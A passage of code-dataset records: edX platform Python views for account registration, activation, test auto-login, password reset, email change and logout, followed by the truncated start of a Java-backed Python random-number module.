    # Note that this feature is only tested as a flag set one way or
    # the other for *new* systems. we need to be careful about
    # changing settings on a running system to make sure no users are
    # left in an inconsistent state (or doing a migration if they are).
    send_email = (
        not settings.FEATURES.get('SKIP_EMAIL_VALIDATION', None) and
        not settings.FEATURES.get('AUTOMATIC_AUTH_FOR_TESTING') and
        not (do_external_auth and settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH')) and
        not (
            third_party_provider and third_party_provider.skip_email_verification and
            user.email == running_pipeline['kwargs'].get('details', {}).get('email')
        )
    )
    if send_email:
        dest_addr = user.email
        context = {
            'name': profile.name,
            'key': registration.activation_key,
        }
        # composes activation email
        subject = render_to_string('emails/activation_email_subject.txt', context)
        # Email subject *must not* contain newlines
        subject = ''.join(subject.splitlines())
        message = render_to_string('emails/activation_email.txt', context)
        from_address = configuration_helpers.get_value(
            'email_from_address',
            settings.DEFAULT_FROM_EMAIL
        )
        try:
            if settings.FEATURES.get('REROUTE_ACTIVATION_EMAIL'):
                dest_addr = settings.FEATURES['REROUTE_ACTIVATION_EMAIL']
                message = ("Activation for %s (%s): %s\n" % (user, user.email, profile.name) +
                           '-' * 80 + '\n\n' + message)
            mail.send_mail(subject, message, from_address, [dest_addr], fail_silently=False)
        except Exception:  # pylint: disable=broad-except
            # Best-effort: account creation proceeds even if the e-mail fails.
            log.error(
                u'Unable to send activation email to user from "%s" to "%s"',
                from_address,
                dest_addr,
                exc_info=True
            )
    else:
        # No e-mail validation required: activate immediately.
        registration.activate()
        _enroll_user_in_pending_courses(user)  # Enroll student in any pending courses
    # Immediately after a user creates an account, we log them in. They are only
    # logged in until they close the browser. They can't log in again until they click
    # the activation link from the email.
    new_user = authenticate(username=user.username, password=params['password'])
    login(request, new_user)
    request.session.set_expiry(0)
    try:
        record_registration_attributions(request, new_user)
    # Don't prevent a user from registering due to attribution errors.
    except Exception:  # pylint: disable=broad-except
        log.exception('Error while attributing cookies to user registration.')
    # TODO: there is no error checking here to see that the user actually logged in successfully,
    # and is not yet an active user.
    if new_user is not None:
        AUDIT_LOG.info(u"Login success on new account creation - {0}".format(new_user.username))
    if do_external_auth:
        eamap.user = new_user
        eamap.dtsignup = datetime.datetime.now(UTC)
        eamap.save()
        AUDIT_LOG.info(u"User registered with external_auth %s", new_user.username)
        AUDIT_LOG.info(u'Updated ExternalAuthMap for %s to be %s', new_user.username, eamap)
        if settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH'):
            log.info('bypassing activation email')
            new_user.is_active = True
            new_user.save()
            AUDIT_LOG.info(u"Login activated on extauth account - {0} ({1})".format(new_user.username, new_user.email))
    return new_user
def _enroll_user_in_pending_courses(student):
    """
    Enroll student in any pending courses he/she may have.
    """
    for cea in CourseEnrollmentAllowed.objects.filter(email=student.email):
        if not cea.auto_enroll:
            continue
        enrollment = CourseEnrollment.enroll(student, cea.course_id)
        manual_enrollment_audit = ManualEnrollmentAudit.get_manual_enrollment_by_email(student.email)
        if manual_enrollment_audit is not None:
            # Mirror the earlier manual-enrollment record with a fresh audit
            # entry marking the allowed -> enrolled transition for this email.
            ManualEnrollmentAudit.create_manual_enrollment_audit(
                manual_enrollment_audit.enrolled_by, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
                manual_enrollment_audit.reason, enrollment
            )
def record_affiliate_registration_attribution(request, user):
    """
    Attribute this user's registration to the referring affiliate, if
    applicable.
    """
    affiliate_id = request.COOKIES.get(settings.AFFILIATE_COOKIE_NAME)
    if not (user and affiliate_id):
        return
    UserAttribute.set_user_attribute(user, REGISTRATION_AFFILIATE_ID, affiliate_id)
def record_utm_registration_attribution(request, user):
    """
    Attribute this user's registration to the latest UTM referrer, if
    applicable.
    """
    utm_cookie = request.COOKIES.get(
        RegistrationCookieConfiguration.current().utm_cookie_name
    )
    if not (user and utm_cookie):
        return

    utm = json.loads(utm_cookie)

    # Persist each recognized UTM parameter that is present in the cookie.
    for param_name, attribute_name in REGISTRATION_UTM_PARAMETERS.items():
        param_value = utm.get(param_name)
        if param_value:
            UserAttribute.set_user_attribute(user, attribute_name, param_value)

    created_at_unixtime = utm.get('created_at')
    if created_at_unixtime:
        # We divide by 1000 here because the javascript timestamp generated is in milliseconds not seconds.
        # PYTHON: time.time()      => 1475590280.823698
        # JS: new Date().getTime() => 1475590280823
        created_at_datetime = datetime.datetime.fromtimestamp(int(created_at_unixtime) / float(1000), tz=UTC)
        UserAttribute.set_user_attribute(user, REGISTRATION_UTM_CREATED_AT, created_at_datetime)
def record_registration_attributions(request, user):
    """
    Attribute this user's registration based on referrer cookies.
    """
    for recorder in (
        record_affiliate_registration_attribution,
        record_utm_registration_attribution,
    ):
        recorder(request, user)
@csrf_exempt
def create_account(request, post_override=None):
    """
    JSON call to create new edX account.
    Used by form in signup_modal.html, which is included into navigation.html
    """
    warnings.warn("Please use RegistrationView instead.", DeprecationWarning)

    try:
        user = create_account_with_params(request, post_override or request.POST)
    except AccountValidationError as exc:
        return JsonResponse({'success': False, 'value': exc.message, 'field': exc.field}, status=400)
    except ValidationError as exc:
        # Only the first failing field/message pair is reported to the caller.
        field, error_list = next(exc.message_dict.iteritems())
        return JsonResponse(
            {
                "success": False,
                "field": field,
                "value": error_list[0],
            },
            status=400
        )

    # The AJAX method calling should know the default destination upon success
    redirect_url = None
    # Resume the third-party-auth pipeline if necessary.
    if third_party_auth.is_enabled() and pipeline.running(request):
        running_pipeline = pipeline.get(request)
        redirect_url = pipeline.get_complete_url(running_pipeline['backend'])

    response = JsonResponse({
        'success': True,
        'redirect_url': redirect_url,
    })
    set_logged_in_cookies(request, response, user)
    return response
def auto_auth(request):
    """
    Create or configure a user account, then log in as that user.

    Enabled only when
    settings.FEATURES['AUTOMATIC_AUTH_FOR_TESTING'] is true.

    Accepts the following querystring parameters:
    * `username`, `email`, and `password` for the user account
    * `full_name` for the user profile (the user's full name; defaults to the username)
    * `staff`: Set to "true" to make the user global staff.
    * `course_id`: Enroll the student in the course with `course_id`
    * `roles`: Comma-separated list of roles to grant the student in the course with `course_id`
    * `no_login`: Define this to create the user but not login
    * `redirect`: Set to "true" will redirect to the `redirect_to` value if set, or
        course home page if course_id is defined, otherwise it will redirect to dashboard
    * `redirect_to`: will redirect to to this url
    * If username, email, or password are not provided, use
      randomly generated credentials.

    Returns a redirect, a JSON response, or a plain-text HttpResponse
    depending on the `redirect` parameter and the request's Accept header.
    """
    # Generate a unique name to use if none provided
    unique_name = uuid.uuid4().hex[0:30]

    # Use the params from the request, otherwise use these defaults
    username = request.GET.get('username', unique_name)
    password = request.GET.get('password', unique_name)
    email = request.GET.get('email', unique_name + "@example.com")
    full_name = request.GET.get('full_name', username)
    is_staff = request.GET.get('staff', None)
    is_superuser = request.GET.get('superuser', None)
    course_id = request.GET.get('course_id', None)
    redirect_to = request.GET.get('redirect_to', None)

    # mode has to be one of 'honor'/'professional'/'verified'/'audit'/'no-id-professional'/'credit'
    enrollment_mode = request.GET.get('enrollment_mode', 'honor')

    course_key = None
    if course_id:
        course_key = CourseLocator.from_string(course_id)
    role_names = [v.strip() for v in request.GET.get('roles', '').split(',') if v.strip()]
    redirect_when_done = request.GET.get('redirect', '').lower() == 'true' or redirect_to
    login_when_done = 'no_login' not in request.GET

    form = AccountCreationForm(
        data={
            'username': username,
            'email': email,
            'password': password,
            'name': full_name,
        },
        tos_required=False
    )

    # Attempt to create the account.
    # If successful, this will return a tuple containing
    # the new user object.
    try:
        user, profile, reg = _do_create_account(form)
    except (AccountValidationError, ValidationError):
        # Attempt to retrieve the existing user; reset its credentials so the
        # caller's requested username/password always work afterwards.
        user = User.objects.get(username=username)
        user.email = email
        user.set_password(password)
        user.save()
        profile = UserProfile.objects.get(user=user)
        reg = Registration.objects.get(user=user)

    # Set the user's global staff bit
    if is_staff is not None:
        user.is_staff = (is_staff == "true")
        user.save()

    if is_superuser is not None:
        user.is_superuser = (is_superuser == "true")
        user.save()

    # Activate the user
    reg.activate()
    reg.save()

    # ensure parental consent threshold is met
    year = datetime.date.today().year
    age_limit = settings.PARENTAL_CONSENT_AGE_LIMIT
    profile.year_of_birth = (year - age_limit) - 1
    profile.save()

    # Enroll the user in a course
    if course_key is not None:
        CourseEnrollment.enroll(user, course_key, mode=enrollment_mode)

    # Apply the roles
    for role_name in role_names:
        role = Role.objects.get(name=role_name, course_id=course_key)
        user.roles.add(role)

    # Log in as the user
    if login_when_done:
        user = authenticate(username=username, password=password)
        login(request, user)

    create_comments_service_user(user)

    # Provide the user with a valid CSRF token
    # then return a 200 response unless redirect is true
    if redirect_when_done:
        # Redirect to specific page if specified
        if redirect_to:
            redirect_url = redirect_to
        # Redirect to course info page if course_id is known
        elif course_id:
            try:
                # redirect to course info page in LMS
                redirect_url = reverse(
                    'info',
                    kwargs={'course_id': course_id}
                )
            except NoReverseMatch:
                # redirect to course outline page in Studio
                redirect_url = reverse(
                    'course_handler',
                    kwargs={'course_key_string': course_id}
                )
        else:
            try:
                # redirect to dashboard for LMS
                redirect_url = reverse('dashboard')
            except NoReverseMatch:
                # redirect to home for Studio
                redirect_url = reverse('home')
        return redirect(redirect_url)
    elif request.META.get('HTTP_ACCEPT') == 'application/json':
        response = JsonResponse({
            'created_status': u"Logged in" if login_when_done else "Created",
            'username': username,
            'email': email,
            'password': password,
            'user_id': user.id,  # pylint: disable=no-member
            'anonymous_id': anonymous_id_for_user(user, None),
        })
    else:
        success_msg = u"{} user {} ({}) with password {} and user_id {}".format(
            u"Logged in" if login_when_done else "Created",
            username, email, password, user.id  # pylint: disable=no-member
        )
        response = HttpResponse(success_msg)
    response.set_cookie('csrftoken', csrf(request)['csrf_token'])
    return response
@ensure_csrf_cookie
def activate_account(request, key):
    """When link in activation e-mail is clicked"""
    matching_registrations = Registration.objects.filter(activation_key=key)

    if len(matching_registrations) == 1:
        registration = matching_registrations[0]
        user_logged_in = request.user.is_authenticated()
        already_active = True
        if not registration.user.is_active:
            registration.activate()
            already_active = False
            # Enroll student in any pending courses he/she may have if auto_enroll flag is set
            _enroll_user_in_pending_courses(registration.user)
        return render_to_response(
            "registration/activation_complete.html",
            {
                'user_logged_in': user_logged_in,
                'already_active': already_active
            }
        )

    if len(matching_registrations) == 0:
        return render_to_response(
            "registration/activation_invalid.html",
            {'csrf': csrf(request)['csrf_token']}
        )

    # More than one registration matched the key: treat as a server error.
    return HttpResponseServerError(_("Unknown error. Please e-mail us to let us know how it happened."))
@csrf_exempt
@require_POST
def password_reset(request):
    """ Attempts to send a password reset e-mail. """
    # Add some rate limiting here by re-using the RateLimitMixin as a helper class
    limiter = BadRequestRateLimiter()
    if limiter.is_rate_limit_exceeded(request):
        AUDIT_LOG.warning("Rate limit exceeded in password_reset")
        return HttpResponseForbidden()

    form = PasswordResetFormNoActive(request.POST)
    if not form.is_valid():
        # bad user? tick the rate limiter counter
        AUDIT_LOG.info("Bad password_reset user passed in.")
        limiter.tick_bad_request_counter(request)
    else:
        form.save(
            use_https=request.is_secure(),
            from_email=configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL),
            request=request,
            domain_override=request.get_host()
        )
        # When password change is complete, a "edx.user.settings.changed" event will be emitted.
        # But because changing the password is multi-step, we also emit an event here so that we can
        # track where the request was initiated.
        tracker.emit(
            SETTING_CHANGE_INITIATED,
            {
                "setting": "password",
                "old": None,
                "new": None,
                "user_id": request.user.id,
            }
        )
        destroy_oauth_tokens(request.user)

    # A success payload is returned regardless of form validity.
    return JsonResponse({
        'success': True,
        'value': render_to_string('registration/password_reset_done.html', {}),
    })
def uidb36_to_uidb64(uidb36):
    """
    Needed to support old password reset URLs that use base36-encoded user IDs
    https://github.com/django/django/commit/1184d077893ff1bc947e45b00a4d565f3df81776#diff-c571286052438b2e3190f8db8331a92bR231
    Args:
        uidb36: base36-encoded user ID

    Returns: base64-encoded user ID. Otherwise returns a dummy, invalid ID
    """
    try:
        user_id = base36_to_int(uidb36)
    except ValueError:
        # dummy invalid ID (incorrect padding for base64)
        return '1'
    return force_text(urlsafe_base64_encode(force_bytes(user_id)))
def validate_password(user, password):
    """
    Tie in password policy enforcement as an optional level of
    security protection

    Args:
        user: the user object whose password we're checking.
        password: the user's proposed new password.

    Returns:
        is_valid_password: a boolean indicating if the new password
            passes the validation.
        err_msg: an error message if there's a violation of one of the password
            checks. Otherwise, `None`.

    Note: when more than one policy check fails, only the message from the
    last failing check is returned.
    """
    err_msg = None

    if settings.FEATURES.get('ENFORCE_PASSWORD_POLICY', False):
        try:
            validate_password_strength(password)
        except ValidationError as err:
            err_msg = _('Password: ') + '; '.join(err.messages)

        # also, check the password reuse policy
        if not PasswordHistory.is_allowable_password_reuse(user, password):
            num_distinct = settings.ADVANCED_SECURITY_CONFIG[
                'MIN_DIFFERENT_STAFF_PASSWORDS_BEFORE_REUSE'
                if user.is_staff
                else 'MIN_DIFFERENT_STUDENT_PASSWORDS_BEFORE_REUSE'
            ]
            # Because of how ngettext is, splitting the following into shorter lines would be ugly.
            # pylint: disable=line-too-long
            err_msg = ungettext(
                "You are re-using a password that you have used recently. You must have {num} distinct password before reusing a previous password.",
                "You are re-using a password that you have used recently. You must have {num} distinct passwords before reusing a previous password.",
                num_distinct
            ).format(num=num_distinct)

        # also, check to see if passwords are getting reset too frequent
        if PasswordHistory.is_password_reset_too_soon(user):
            num_days = settings.ADVANCED_SECURITY_CONFIG['MIN_TIME_IN_DAYS_BETWEEN_ALLOWED_RESETS']
            # Because of how ngettext is, splitting the following into shorter lines would be ugly.
            # pylint: disable=line-too-long
            err_msg = ungettext(
                "You are resetting passwords too frequently. Due to security policies, {num} day must elapse between password resets.",
                "You are resetting passwords too frequently. Due to security policies, {num} days must elapse between password resets.",
                num_days
            ).format(num=num_days)

    return err_msg is None, err_msg
def password_reset_confirm_wrapper(request, uidb36=None, token=None):
    """
    A wrapper around django.contrib.auth.views.password_reset_confirm.
    Needed because we want to set the user as active at this step.
    We also optionally do some additional password policy checks.

    Arguments:
        request: the incoming HttpRequest (GET renders the form, POST applies
            the new password).
        uidb36: base36-encoded user ID from the (old-style) reset URL.
        token: the password-reset token from the reset URL.
    """
    # convert old-style base36-encoded user id to base64
    uidb64 = uidb36_to_uidb64(uidb36)
    platform_name = {
        "platform_name": configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
    }
    try:
        uid_int = base36_to_int(uidb36)
        user = User.objects.get(id=uid_int)
    except (ValueError, User.DoesNotExist):
        # if there's any error getting a user, just let django's
        # password_reset_confirm function handle it.
        return password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

    if request.method == 'POST':
        password = request.POST['new_password1']
        is_password_valid, password_err_msg = validate_password(user, password)
        if not is_password_valid:
            # We have a password reset attempt which violates some security
            # policy. Use the existing Django template to communicate that
            # back to the user.
            context = {
                'validlink': False,
                'form': None,
                'title': _('Password reset unsuccessful'),
                'err_msg': password_err_msg,
            }
            context.update(platform_name)
            return TemplateResponse(
                request, 'registration/password_reset_confirm.html', context
            )

        # remember what the old password hash is before we call down
        old_password_hash = user.password

        response = password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

        # If password reset was unsuccessful a template response is returned (status_code 200).
        # Check if form is invalid then show an error to the user.
        # Note if password reset was successful we get response redirect (status_code 302).
        if response.status_code == 200 and not response.context_data['form'].is_valid():
            response.context_data['err_msg'] = _('Error in resetting your password. Please try again.')
            return response

        # get the updated user
        updated_user = User.objects.get(id=uid_int)

        # did the password hash change, if so record it in the PasswordHistory
        if updated_user.password != old_password_hash:
            entry = PasswordHistory()
            entry.create(updated_user)
    else:
        # GET: render the reset form via the stock Django view.
        response = password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

        # A valid reset link also activates a not-yet-active account, so a
        # user who lost the activation e-mail can recover via password reset.
        response_was_successful = response.context_data.get('validlink')
        if response_was_successful and not user.is_active:
            user.is_active = True
            user.save()

    return response
def reactivation_email_for_user(user):
    """
    Send a fresh activation e-mail to ``user`` and report the outcome as
    a JsonResponse with a ``success`` flag (and an ``error`` message on
    failure).
    """
    try:
        reg = Registration.objects.get(user=user)
    except Registration.DoesNotExist:
        return JsonResponse({
            "success": False,
            "error": _('No inactive user with this e-mail exists'),
        })  # TODO: this should be status code 400  # pylint: disable=fixme

    email_context = {
        'name': user.profile.name,
        'key': reg.activation_key,
    }
    # Subject must be a single line, so strip any newlines the template emits.
    subject = ''.join(
        render_to_string('emails/activation_email_subject.txt', email_context).splitlines()
    )
    message = render_to_string('emails/activation_email.txt', email_context)
    from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)

    try:
        user.email_user(subject, message, from_address)
    except Exception:  # pylint: disable=broad-except
        log.error(
            u'Unable to send reactivation email from "%s" to "%s"',
            from_address,
            user.email,
            exc_info=True
        )
        return JsonResponse({
            "success": False,
            "error": _('Unable to send reactivation email')
        })  # TODO: this should be status code 500  # pylint: disable=fixme

    return JsonResponse({"success": True})
def validate_new_email(user, new_email):
    """
    Given a new email for a user, does some basic verification of the new address If any issues are encountered
    with verification a ValueError will be thrown.
    """
    # Syntactic validity first.
    try:
        validate_email(new_email)
    except ValidationError:
        raise ValueError(_('Valid e-mail address required.'))

    # The address must actually change.
    if new_email == user.email:
        raise ValueError(_('Old email is the same as the new email.'))

    # And it must not collide with another account.
    if User.objects.filter(email=new_email).count() != 0:
        raise ValueError(_('An account with this e-mail already exists.'))
def do_email_change_request(user, new_email, activation_key=None):
    """
    Given a new email for a user, does some basic verification of the new address and sends an activation message
    to the new address. If any issues are encountered with verification or sending the message, a ValueError will
    be thrown.
    """
    # Reuse the user's existing pending-change row if one exists.
    pec_list = PendingEmailChange.objects.filter(user=user)
    if len(pec_list) == 0:
        pec = PendingEmailChange()
        pec.user = user
    else:
        pec = pec_list[0]

    # if activation_key is not passing as an argument, generate a random key
    if not activation_key:
        activation_key = uuid.uuid4().hex

    pec.new_email = new_email
    pec.activation_key = activation_key
    pec.save()

    context = {
        'key': pec.activation_key,
        'old_email': user.email,
        'new_email': pec.new_email
    }

    # Subject must be a single line, so strip any newlines the template emits.
    subject = ''.join(render_to_string('emails/email_change_subject.txt', context).splitlines())
    message = render_to_string('emails/email_change.txt', context)
    from_address = configuration_helpers.get_value(
        'email_from_address',
        settings.DEFAULT_FROM_EMAIL
    )

    try:
        mail.send_mail(subject, message, from_address, [pec.new_email])
    except Exception:  # pylint: disable=broad-except
        log.error(u'Unable to send email activation link to user from "%s"', from_address, exc_info=True)
        raise ValueError(_('Unable to send email activation link. Please try again later.'))

    # When the email address change is complete, a "edx.user.settings.changed" event will be emitted.
    # But because changing the email address is multi-step, we also emit an event here so that we can
    # track where the request was initiated.
    tracker.emit(
        SETTING_CHANGE_INITIATED,
        {
            "setting": "email",
            "old": context['old_email'],
            "new": context['new_email'],
            "user_id": user.id,
        }
    )
@ensure_csrf_cookie
def confirm_email_change(request, key):  # pylint: disable=unused-argument
    """
    User requested a new e-mail. This is called when the activation
    link is clicked. We confirm with the old e-mail, and update

    :param key: the activation key from the emailed link, identifying the
        PendingEmailChange record
    """
    # Every failure path below renders an error page AND marks the enclosing
    # transaction rollback-only, so no partial state (profile meta history,
    # address swap) is ever committed.
    with transaction.atomic():
        try:
            pec = PendingEmailChange.objects.get(activation_key=key)
        except PendingEmailChange.DoesNotExist:
            response = render_to_response("invalid_email_key.html", {})
            transaction.set_rollback(True)
            return response

        user = pec.user
        address_context = {
            'old_email': user.email,
            'new_email': pec.new_email
        }

        # The target address may have been taken by another account since the
        # change was originally requested.
        if len(User.objects.filter(email=pec.new_email)) != 0:
            response = render_to_response("email_exists.html", {})
            transaction.set_rollback(True)
            return response

        subject = render_to_string('emails/email_change_subject.txt', address_context)
        # Email subjects must be a single line.
        subject = ''.join(subject.splitlines())
        message = render_to_string('emails/confirm_email_change.txt', address_context)

        # Record the outgoing address (with a UTC timestamp) in the profile's
        # meta so previous addresses remain auditable.
        u_prof = UserProfile.objects.get(user=user)
        meta = u_prof.get_meta()
        if 'old_emails' not in meta:
            meta['old_emails'] = []
        meta['old_emails'].append([user.email, datetime.datetime.now(UTC).isoformat()])
        u_prof.set_meta(meta)
        u_prof.save()

        # Send it to the old email...
        try:
            user.email_user(
                subject,
                message,
                configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
            )
        except Exception:  # pylint: disable=broad-except
            log.warning('Unable to send confirmation email to old address', exc_info=True)
            response = render_to_response("email_change_failed.html", {'email': user.email})
            transaction.set_rollback(True)
            return response

        # Only now actually switch the address and retire the pending record.
        user.email = pec.new_email
        user.save()
        pec.delete()

        # And send it to the new email...
        try:
            user.email_user(
                subject,
                message,
                configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
            )
        except Exception:  # pylint: disable=broad-except
            log.warning('Unable to send confirmation email to new address', exc_info=True)
            response = render_to_response("email_change_failed.html", {'email': pec.new_email})
            transaction.set_rollback(True)
            return response

        response = render_to_response("email_change_successful.html", address_context)
        return response
@require_POST
@login_required
@ensure_csrf_cookie
def change_email_settings(request):
    """Modify logged-in user's setting for receiving emails from a course.

    Expects POST fields ``course_id`` and ``receive_emails`` (any truthy
    value means opt in); returns a JSON ``{"success": True}`` response.
    """
    user = request.user

    course_id = request.POST.get("course_id")
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    receive_emails = request.POST.get("receive_emails")
    # An Optout row means "do NOT email me for this course"; opting back in
    # deletes the row, opting out creates it (idempotently).
    if receive_emails:
        optout_object = Optout.objects.filter(user=user, course_id=course_key)
        if optout_object:
            optout_object.delete()
        log.info(
            u"User %s (%s) opted in to receive emails from course %s",
            user.username,
            user.email,
            course_id,
        )
        track.views.server_track(
            request,
            "change-email-settings",
            {"receive_emails": "yes", "course": course_id},
            page='dashboard',
        )
    else:
        Optout.objects.get_or_create(user=user, course_id=course_key)
        log.info(
            u"User %s (%s) opted out of receiving emails from course %s",
            user.username,
            user.email,
            course_id,
        )
        track.views.server_track(
            request,
            "change-email-settings",
            {"receive_emails": "no", "course": course_id},
            page='dashboard',
        )

    return JsonResponse({"success": True})
class LogoutView(TemplateView):
    """
    Logs out user and redirects.

    The template should load iframes to log the user out of OpenID Connect services.
    See http://openid.net/specs/openid-connect-logout-1_0.html.
    """
    # OAuth2 client ids captured from the session before logout clears it.
    oauth_client_ids = []
    template_name = 'logout.html'

    # Keep track of the page to which the user should ultimately be redirected.
    target = reverse_lazy('cas-logout') if settings.FEATURES.get('AUTH_USE_CAS') else '/'

    def dispatch(self, request, *args, **kwargs):  # pylint: disable=missing-docstring
        # We do not log here, because we have a handler registered to perform logging on successful logouts.
        request.is_from_logout = True

        # Get the list of authorized clients before we clear the session.
        self.oauth_client_ids = request.session.get(edx_oauth2_provider.constants.AUTHORIZED_CLIENTS_SESSION_KEY, [])

        logout(request)

        # If we don't need to deal with OIDC logouts, just redirect the user.
        if LogoutViewConfiguration.current().enabled and self.oauth_client_ids:
            response = super(LogoutView, self).dispatch(request, *args, **kwargs)
        else:
            response = redirect(self.target)

        # Clear the cookie used by the edx.org marketing site
        delete_logged_in_cookies(response)

        return response

    def _build_logout_url(self, url):
        """
        Builds a logout URL with the `no_redirect` query string parameter.

        Args:
            url (str): IDA logout URL

        Returns:
            str
        """
        scheme, netloc, path, query_string, fragment = urlsplit(url)
        query_params = parse_qs(query_string)
        query_params['no_redirect'] = 1
        new_query_string = urlencode(query_params, doseq=True)
        return urlunsplit((scheme, netloc, path, new_query_string, fragment))

    def get_context_data(self, **kwargs):
        context = super(LogoutView, self).get_context_data(**kwargs)

        # Create a list of URIs that must be called to log the user out of all of the IDAs.
        uris = Client.objects.filter(client_id__in=self.oauth_client_ids,
                                     logout_uri__isnull=False).values_list('logout_uri', flat=True)

        # NOTE(review): URIs matching the referrer are skipped, presumably
        # because the referring IDA's session is already ended by this
        # request -- confirm against the OIDC logout flow.
        referrer = self.request.META.get('HTTP_REFERER', '').strip('/')
        logout_uris = []

        for uri in uris:
            if not referrer or (referrer and not uri.startswith(referrer)):
                logout_uris.append(self._build_logout_url(uri))

        context.update({
            'target': self.target,
            'logout_uris': logout_uris,
        })

        return context
|
itsjeyd/edx-platform
|
common/djangoapps/student/views.py
|
Python
|
agpl-3.0
| 107,769
|
[
"VisIt"
] |
737d150ee3aa6d62ebb66c2628d3e109a84073f1a026a2733f9af3121db11304
|
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
"""
# python random module look-a-like. Uses wrapped java.util.Random for actual random generation
class Random:
    """
    Random number generator base class used by bound module functions.

    Used to instantiate instances of Random to get generators that don't
    share state. Especially useful for multi-threaded programs, creating
    a different instance of Random for each thread.

    Class Random can also be subclassed if you want to use a different basic
    generator of your own devising: in that case, override the following
    methods: random(), seed(), getstate(), setstate() and jumpahead().
    """

    def __init__(self, x=None):
        """Initialize an instance.

        Optional argument x controls seeding, as for Random.seed().
        """
        # NOTE(review): javainstance() is supplied by the Java-backed host
        # runtime (it is not defined in this module); the wrapped
        # java.util.Random performs the actual generation.
        self._jrandom = javainstance("__random__")
        # Delegate the core generator API directly to the wrapped object.
        self.random = self._jrandom.random
        self.seed = self._jrandom.seed
        self.getstate = self._jrandom.getstate
        self.setstate = self._jrandom.setstate
        self.randrange = self._jrandom.randrange
        self.randint = self._jrandom.randint
        self.getrandbits = self._jrandom.getrandbits
        if x is not None:  # idiom fix: was "if not x is None"
            self.seed(x)
        self.gauss_next = None

    def choice(self, seq):
        """Choose a random element from a non-empty sequence."""
        return seq[int(self.random() * len(seq))]  # raises IndexError if seq is empty

    def shuffle(self, x, random=None):
        """x, random=random.random -> shuffle list x in place; return None.

        Optional arg random is a 0-argument function returning a random
        float in [0.0, 1.0); by default, the standard random.random.
        """
        if random is None:
            random = self.random
        _int = int
        # Fisher-Yates: walk backwards, swapping each slot with a random
        # earlier (or same) slot.
        for i in reversed(xrange(1, len(x))):
            # pick an element in x[:i+1] with which to exchange x[i]
            j = _int(random() * (i+1))
            x[i], x[j] = x[j], x[i]

    def sample(self, population, k):
        """Chooses k unique random elements from a population sequence.

        Returns a new list containing elements from the population while
        leaving the original population unchanged. The resulting list is
        in selection order so that all sub-slices will also be valid random
        samples. This allows raffle winners (the sample) to be partitioned
        into grand prize and second place winners (the subslices).

        Members of the population need not be hashable or unique. If the
        population contains repeats, then each occurrence is a possible
        selection in the sample.

        To choose a sample in a range of integers, use xrange as an argument.
        This is especially fast and space efficient for sampling from a
        large population: sample(xrange(10000000), 60)
        """
        # Sampling without replacement entails tracking either potential
        # selections (the pool) in a list or previous selections in a set.

        # When the number of selections is small compared to the
        # population, then tracking selections is efficient, requiring
        # only a small set and an occasional reselection. For
        # a larger number of selections, the pool tracking method is
        # preferred since the list takes less space than the
        # set and it doesn't suffer from frequent reselections.

        n = len(population)
        if not 0 <= k <= n:
            raise ValueError("sample larger than population")
        random = self.random
        _int = int
        result = [None] * k
        setsize = 21  # size of a small set minus size of an empty list
        if k > 5:
            setsize += 4 ** _ceil(_log(k * 3, 4))  # table size for big sets
        if n <= setsize or hasattr(population, "keys"):
            # An n-length list is smaller than a k-length set, or this is a
            # mapping type so the other algorithm wouldn't work.
            pool = list(population)
            for i in xrange(k):  # invariant: non-selected at [0,n-i)
                j = _int(random() * (n-i))
                result[i] = pool[j]
                pool[j] = pool[n-i-1]  # move non-selected item into vacancy
        else:
            try:
                selected = set()
                selected_add = selected.add
                for i in xrange(k):
                    j = _int(random() * n)
                    while j in selected:
                        j = _int(random() * n)
                    selected_add(j)
                    result[i] = population[j]
            except (TypeError, KeyError):  # handle (at least) sets
                if isinstance(population, list):
                    raise
                return self.sample(tuple(population), k)
        return result

    ## -------------------- real-valued distributions -------------------

    ## -------------------- uniform distribution -------------------

    def uniform(self, a, b):
        "Get a random number in the range [a, b) or [a, b] depending on rounding."
        return a + (b-a) * self.random()

    ## -------------------- triangular --------------------

    def triangular(self, low=0.0, high=1.0, mode=None):
        """Triangular distribution.

        Continuous distribution bounded by given lower and upper limits,
        and having a given mode value in-between.

        http://en.wikipedia.org/wiki/Triangular_distribution
        """
        u = self.random()
        try:
            c = 0.5 if mode is None else (mode - low) / (high - low)
        except ZeroDivisionError:
            return low
        if u > c:
            u = 1.0 - u
            c = 1.0 - c
            low, high = high, low
        return low + (high - low) * (u * c) ** 0.5

    ## -------------------- normal distribution --------------------

    def normalvariate(self, mu, sigma):
        """Normal distribution.

        mu is the mean, and sigma is the standard deviation.
        """
        # mu = mean, sigma = standard deviation

        # Uses Kinderman and Monahan method. Reference: Kinderman,
        # A.J. and Monahan, J.F., "Computer generation of random
        # variables using the ratio of uniform deviates", ACM Trans
        # Math Software, 3, (1977), pp257-260.

        random = self.random
        while 1:
            u1 = random()
            u2 = 1.0 - random()
            z = NV_MAGICCONST*(u1-0.5)/u2
            zz = z*z/4.0
            if zz <= -_log(u2):
                break
        return mu + z*sigma

    ## -------------------- lognormal distribution --------------------

    def lognormvariate(self, mu, sigma):
        """Log normal distribution.

        If you take the natural logarithm of this distribution, you'll get a
        normal distribution with mean mu and standard deviation sigma.
        mu can have any value, and sigma must be greater than zero.
        """
        return _exp(self.normalvariate(mu, sigma))

    ## -------------------- exponential distribution --------------------

    def expovariate(self, lambd):
        """Exponential distribution.

        lambd is 1.0 divided by the desired mean. It should be
        nonzero. (The parameter would be called "lambda", but that is
        a reserved word in Python.) Returned values range from 0 to
        positive infinity if lambd is positive, and from negative
        infinity to 0 if lambd is negative.
        """
        # lambd: rate lambd = 1/mean
        # ('lambda' is a Python reserved word)

